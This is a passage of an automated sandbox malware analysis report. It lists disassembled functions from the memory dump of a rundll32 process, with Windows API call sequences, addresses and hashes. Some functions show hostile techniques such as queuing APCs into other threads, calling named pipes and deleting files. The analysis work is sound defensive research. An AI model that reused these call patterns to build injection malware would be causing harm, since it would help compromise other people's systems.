                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 05B73CEE
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CFA
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B73D16
                          • wsprintfA.USER32 ref: 05B73DF8
                          • memcpy.NTDLL(00000000,00004000,?), ref: 05B73E45
                          • InterlockedExchange.KERNEL32(05B8A128,00000000), ref: 05B73E63
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B73EA4
                            • Part of subcall function 05B7E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7E3F6
                            • Part of subcall function 05B7E3CD: memcpy.NTDLL(00000000,?,?), ref: 05B7E409
                            • Part of subcall function 05B7E3CD: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7E41A
                            • Part of subcall function 05B7E3CD: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7E42F
                            • Part of subcall function 05B7E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B7E467
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                          • String ID:
                          • API String ID: 4198405257-0
                          • Opcode ID: e8739fbef2737f8212ade432b57eb18a05ac2945d451b068a1d961cd30df8e3d
                          • Instruction ID: ea93d5a795c237c5e0ab9d8ebc1f7eae94ebb8672fe9a9a73544a8802d329528
                          • Opcode Fuzzy Hash: e8739fbef2737f8212ade432b57eb18a05ac2945d451b068a1d961cd30df8e3d
                          • Instruction Fuzzy Hash: F7615C71A1020AEFCF10DFA5DC85EAA7BFAFB04300F1544AAF91697250DB34BA55DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B78CF3 Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05B69100,?), ref: 05B78D13
                          • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D1D
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D46
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D54
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D62
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D70
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D7E
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D8C
                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 05B78DB6
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,05B69100,?), ref: 05B78E37
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                          • String ID:
                          • API String ID: 1792504554-0
                          • Opcode ID: 512b082cc593af53d7791cff36191d3580ebfe50e337b4dd790ebb62799d433f
                          • Instruction ID: 879e264ba331c18b2ffd4f24cde0b0d7f24be6f4a0ed28ebc7d65dd7e7b78c4c
                          • Opcode Fuzzy Hash: 512b082cc593af53d7791cff36191d3580ebfe50e337b4dd790ebb62799d433f
                          • Instruction Fuzzy Hash: DB418471A1011CEFCB00EFA8D8CADB97BF9FB09214B6554A6F219DB140D734B905CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E8BB Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B62F91: memset.NTDLL ref: 05B62FB3
                            • Part of subcall function 05B62F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B6305D
                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 05B7E903
                          • CloseHandle.KERNEL32(?), ref: 05B7E90F
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B7E91F
                          • lstrlenW.KERNEL32(00000000), ref: 05B7E928
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B7E939
                          • wcstombs.NTDLL ref: 05B7E948
                          • lstrlen.KERNEL32(?), ref: 05B7E955
                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 05B7E994
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7E9A7
                          • DeleteFileW.KERNEL32(?), ref: 05B7E9B4
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                          • String ID:
                          • API String ID: 2256351002-0
                          • Opcode ID: 44bb24a9188466881da58c21f2ef2c6e5713b93460defe5696645129fc52309e
                          • Instruction ID: 84c19ca8b38bb713bd04370353bcfad2f8dc440c59b73a56efa822504bfc7340
                          • Opcode Fuzzy Hash: 44bb24a9188466881da58c21f2ef2c6e5713b93460defe5696645129fc52309e
                          • Instruction Fuzzy Hash: 65310636610209BBDF21AFA5DD4ADAF7FBAFF45311F0000A5F912A6190DB31A915DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7B9E9 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTickCount.KERNEL32 ref: 05B7B9F9
                          • CreateFileW.KERNEL32(05B70971,80000000,00000003,05B8A1E8,00000003,00000000,00000000,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA16
                          • GetLastError.KERNEL32(?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BABE
                            • Part of subcall function 05B8087A: lstrlen.KERNEL32(?,00000000,05B7BA3E,00000027,05B8A1E8,?,00000000,?,?,05B7BA3E,?,00000001,?,05B70971,00000000,?), ref: 05B808B0
                            • Part of subcall function 05B8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 05B808D4
                            • Part of subcall function 05B8087A: lstrcat.KERNEL32(00000000,00000000), ref: 05B808DC
                          • GetFileSize.KERNEL32(05B70971,00000000,?,00000001,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA49
                          • CreateFileMappingA.KERNEL32(05B70971,05B8A1E8,00000002,00000000,00000000,05B70971), ref: 05B7BA5D
                          • lstrlen.KERNEL32(05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA79
                          • lstrcpy.KERNEL32(?,05B70971), ref: 05B7BA89
                          • GetLastError.KERNEL32(?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA91
                          • HeapFree.KERNEL32(00000000,05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BAA4
                          • CloseHandle.KERNEL32(05B70971,?,00000001,?,05B70971), ref: 05B7BAB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                          • String ID:
                          • API String ID: 194907169-0
                          • Opcode ID: 520a06d456c8fe67af1c8521c4e047858d1665b6ed86732142daba3b18644e0d
                          • Instruction ID: 608b62cf081d18491e1007918032d3ef294557faf56efafb92effe351ebfed31
                          • Opcode Fuzzy Hash: 520a06d456c8fe67af1c8521c4e047858d1665b6ed86732142daba3b18644e0d
                          • Instruction Fuzzy Hash: F721FE71900608FFDB20AFA4D849AAD7FBAFF04354F109469F555E7290DB30AA54DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6EE04 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05B6EE2A
                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05B6EE36
                          • GetModuleHandleA.KERNEL32(?,05FB978E,00000000,?,00000000), ref: 05B6EE56
                          • GetProcAddress.KERNEL32(00000000), ref: 05B6EE5D
                          • Thread32First.KERNEL32(?,0000001C), ref: 05B6EE6D
                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05B6EE88
                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 05B6EE99
                          • CloseHandle.KERNEL32(00000000), ref: 05B6EEA0
                          • Thread32Next.KERNEL32(?,0000001C), ref: 05B6EEA9
                          • CloseHandle.KERNEL32(?), ref: 05B6EEB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                          • String ID:
                          • API String ID: 2341152533-0
                          • Opcode ID: bcadf475fc6652e8efe03342e4dd48a469b7ab761682f85e7cc5f680b54f4ae3
                          • Instruction ID: 72c4c923037239da813b411fc3589daf660d43733656bbb6d1b94bd1cbc9e606
                          • Opcode Fuzzy Hash: bcadf475fc6652e8efe03342e4dd48a469b7ab761682f85e7cc5f680b54f4ae3
                          • Instruction Fuzzy Hash: AB212472900108BFDF11AFA4DC89DAE7BAEFB08254B10416AFA01A7190DB34F945CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6DC41 Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(00000000,?,05B7507B), ref: 05B6DC56
                            • Part of subcall function 05B75D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 05B75D59
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,05B7507B), ref: 05B6DC76
                          • CloseHandle.KERNEL32(00000000,?,05B7507B), ref: 05B6DC7F
                          • CloseHandle.KERNEL32(00000000,?,?,05B7507B), ref: 05B6DC89
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B6DC91
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B6DCA9
                          • Sleep.KERNEL32(000001F4), ref: 05B6DCB8
                          • CloseHandle.KERNEL32(00000000), ref: 05B6DCC5
                          • LocalFree.KERNEL32(?), ref: 05B6DCD0
                          • RtlDeleteCriticalSection.NTDLL(?), ref: 05B6DCDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                          • String ID:
                          • API String ID: 1408595562-0
                          • Opcode ID: 1dee7b55717646d0169c8c387aa2790edb0696a86a76402a01acc7234d51d884
                          • Instruction ID: d3507db748bc3b5e8359fea85b66cc2720729ab9257d19226678eab3f1de1c8b
                          • Opcode Fuzzy Hash: 1dee7b55717646d0169c8c387aa2790edb0696a86a76402a01acc7234d51d884
                          • Instruction Fuzzy Hash: 1411857121071AEFCB30AB65DD59D6ABBAAFF047403140968F29283490DF79F840CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6DD7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05B63DA2,00000000,00000001,?,?,?), ref: 05B6DD92
                          • lstrlen.KERNEL32(?), ref: 05B6DDA2
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DDD6
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05B6DE01
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6DE20
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6DE81
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05B6DEA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                          • String ID: W
                          • API String ID: 3204852930-655174618
                          • Opcode ID: 4de0e293e57e511325f13f23bd6d6a18155adc5d821fc5d98213dc4b9022eb30
                          • Instruction ID: 13335fb22c2977f20b65f41dd2c58898534f413c792337e4cfe6362a4efb07e2
                          • Opcode Fuzzy Hash: 4de0e293e57e511325f13f23bd6d6a18155adc5d821fc5d98213dc4b9022eb30
                          • Instruction Fuzzy Hash: 1E413CB1A0120AEFCF11DF95CC84AAE7BB9FF14244F1444A9F915A7210E735EA54DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A107 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                            • Part of subcall function 05B6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 05B6A153
                          • wsprintfA.USER32 ref: 05B6A181
                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 05B6A1DF
                          • GetLastError.KERNEL32 ref: 05B6A1F6
                          • ResetEvent.KERNEL32(?), ref: 05B6A20A
                          • ResetEvent.KERNEL32(?), ref: 05B6A20F
                          • GetLastError.KERNEL32 ref: 05B6A227
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                          • String ID: `
                          • API String ID: 2276693960-1850852036
                          • Opcode ID: 8eec1035d896369b83cd0c3856398e72ef79944c3adef1eaf84d42b16c07822f
                          • Instruction ID: d8432aea6f70de923ca0b65da4ceac7fc90e7aedbe862a97cbfbc1fbc1cf1fe3
                          • Opcode Fuzzy Hash: 8eec1035d896369b83cd0c3856398e72ef79944c3adef1eaf84d42b16c07822f
                          • Instruction Fuzzy Hash: 97413871500209EFDF21EFA5DD89AAEBBB9FF05310F104466F911A2250EB35FA54CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B63172 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                          • memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                          • GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                          • String ID: (
                          • API String ID: 2237239663-3887548279
                          • Opcode ID: 5bd25cb466da976ef0d8317f584d090b199fa60f9d69560d39e236c1099d10ec
                          • Instruction ID: 0d0cabb167528e19aba277b62361ac1b2f480c76120add9cf93d9da005aebdff
                          • Opcode Fuzzy Hash: 5bd25cb466da976ef0d8317f584d090b199fa60f9d69560d39e236c1099d10ec
                          • Instruction Fuzzy Hash: 4931A036900209BFDB21DF95DC45AAB7FB9FB44750F144829FD0AA3240D634FA54DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77736 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B77777
                          • memset.NTDLL ref: 05B7778B
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • GetCurrentThreadId.KERNEL32 ref: 05B77818
                          • GetCurrentThread.KERNEL32 ref: 05B7782B
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B778D2
                          • Sleep.KERNEL32(0000000A), ref: 05B778DC
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B77902
                          • HeapFree.KERNEL32(00000000,?), ref: 05B77930
                          • HeapFree.KERNEL32(00000000,00000018), ref: 05B77943
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                          • String ID:
                          • API String ID: 1146182784-0
                          • Opcode ID: 63f5e1737c59ef5e4199792497ddbd537ac3a73a5af435ed47f986fb4b3eb6c2
                          • Instruction ID: d216f374e476048130d6921f780848736d45f97fa9370541e982840766885ab7
                          • Opcode Fuzzy Hash: 63f5e1737c59ef5e4199792497ddbd537ac3a73a5af435ed47f986fb4b3eb6c2
                          • Instruction Fuzzy Hash: 49517AB5618305EFD710EF64D88586ABBEAFB88254F100C6EF5A5D7210DB30F948DB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B72812 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 05B7284F
                          • memset.NTDLL ref: 05B72860
                          • lstrcmpi.KERNEL32(?,?), ref: 05B728A0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B728CC
                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05B78974), ref: 05B728E0
                          • memset.NTDLL ref: 05B728ED
                          • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B72906
                          • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B72929
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05B78974), ref: 05B72946
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                          • String ID:
                          • API String ID: 694413484-0
                          • Opcode ID: cba2bc46b110bc1bec9f79af6ad46d57a2834f08041d3781a17eb93c222bd248
                          • Instruction ID: 911b6b73c459ab8730083998492ce2f037819372976ee9724b3b684a6d3a88d6
                          • Opcode Fuzzy Hash: cba2bc46b110bc1bec9f79af6ad46d57a2834f08041d3781a17eb93c222bd248
                          • Instruction Fuzzy Hash: D6418E76E00219BFDB109FA4CC84BADBBBAFF08314F5440A9F525A7250DB35BA45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C9B5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7C9CC
                          • lstrlen.KERNEL32(?), ref: 05B7C9D4
                          • lstrlen.KERNEL32(?), ref: 05B7CA3F
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CA6A
                          • memcpy.NTDLL(00000000,00000002,?), ref: 05B7CA7B
                          • memcpy.NTDLL(00000000,?,?), ref: 05B7CA91
                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05B7CAA3
                          • memcpy.NTDLL(00000000,05B853E8,00000002,00000000,?,?,00000000,?,?), ref: 05B7CAB6
                          • memcpy.NTDLL(00000000,?,00000002), ref: 05B7CACB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$lstrlen$AllocateHeap
                          • String ID:
                          • API String ID: 3386453358-0
                          • Opcode ID: 96be5bf2a3e62f187e69d6ec965fa0b7eacbd98ba6c76aa0dab0b55f373de7e2
                          • Instruction ID: a0c5aaf6b0f1cec22b466516f55e607b78f350c0c0d4a40178138dc139a6618c
                          • Opcode Fuzzy Hash: 96be5bf2a3e62f187e69d6ec965fa0b7eacbd98ba6c76aa0dab0b55f373de7e2
                          • Instruction Fuzzy Hash: 26413E76D0020DEBCF10DFA8CC84AAEBFB9FF48215F14409AE915A7245E771EA50DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6605B Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B660AC
                          • lstrlen.KERNEL32(00000008,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660BB
                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 05B660CD
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660DD
                          • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660EF
                          • lstrcpy.KERNEL32(00000020), ref: 05B66121
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B6612D
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B66185
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 3746371830-0
                          • Opcode ID: d5ea70b83fa0f4c536275801c506f37e14a4e15a33076819be46a3f57c0c2959
                          • Instruction ID: a1aa6607efbe412b3519ace4ea95d943765e9cc241ab02a5dab13c423ae28fb8
                          • Opcode Fuzzy Hash: d5ea70b83fa0f4c536275801c506f37e14a4e15a33076819be46a3f57c0c2959
                          • Instruction Fuzzy Hash: E7414671910705EFCB219F58C849B6ABBBAFF08314F20A55AF80997241DB78B954DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7FBF1 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B75119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B7514B
                            • Part of subcall function 05B75119: HeapFree.KERNEL32(00000000,00000000,?,?,05B7FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 05B75170
                            • Part of subcall function 05B779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,05B7FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 05B779DC
                            • Part of subcall function 05B779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,05B7FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05B77A2F
                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FC63
                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FC6B
                          • lstrlen.KERNEL32(?), ref: 05B7FC75
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7FC8A
                          • wsprintfA.USER32 ref: 05B7FCC6
                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 05B7FCE5
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7FCFA
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7FD07
                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FD15
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                          • String ID:
                          • API String ID: 168057987-0
                          • Opcode ID: 7235c1ba7d52b5ccbeb71a2ffeff12e29a569af60aa56a3ec31232367da84ebd
                          • Instruction ID: f2d4df2a132f0304af9d7a3d73fd01322b125baef8c358ec6df45f8b2b4163b6
                          • Opcode Fuzzy Hash: 7235c1ba7d52b5ccbeb71a2ffeff12e29a569af60aa56a3ec31232367da84ebd
                          • Instruction Fuzzy Hash: 3F319E31614319BFCB21AF64DC46E6BBFEAFF48210F00086AF954A7151DB70E818DB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6F39B Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                          • GetLastError.KERNEL32 ref: 05B6F3E5
                          • WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                          • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                          • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                          • SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                          • GetLastError.KERNEL32 ref: 05B6F483
                          • CloseHandle.KERNEL32(00001000), ref: 05B6F48F
